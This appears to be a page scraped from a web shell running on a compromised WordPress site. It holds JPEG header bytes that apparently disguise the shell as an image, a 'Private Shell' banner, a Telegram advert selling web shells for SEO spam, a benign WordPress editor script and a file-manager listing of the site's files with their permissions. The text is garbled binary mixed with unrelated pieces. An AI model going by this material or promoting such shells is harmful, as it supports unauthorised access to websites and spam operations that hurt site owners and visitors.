����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import { select, subscribe } from '@wordpress/data';
export const whenEditorIsReady = () => {
return new Promise((resolve) => {
const unsubscribe = subscribe(() => {
// This will trigger after the initial render blocking, before the window load event
// This seems currently more reliable than using __unstableIsEditorReady
if (
select('core/editor').isCleanNewPost() ||
select('core/block-editor').getBlockCount() > 0
) {
unsubscribe();
resolve();
}
});
});
};
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| api-fetch.js | File | 346 B | 0644 |
|
| data.js | File | 341 B | 0644 |
|
| dom.js | File | 254 B | 0644 |
|
| embedded-guard.js | File | 669 B | 0644 |
|
| media-views.js | File | 1.97 KB | 0644 |
|
| pages.js | File | 16.27 KB | 0644 |
|
| parsing.js | File | 206 B | 0644 |
|
| track.js | File | 713 B | 0644 |
|
| unsplash.js | File | 1.93 KB | 0644 |
|
| utils.js | File | 1.72 KB | 0644 |
|
| variant-classes.js | File | 4.72 KB | 0644 |
|
| wp.js | File | 499 B | 0644 |
|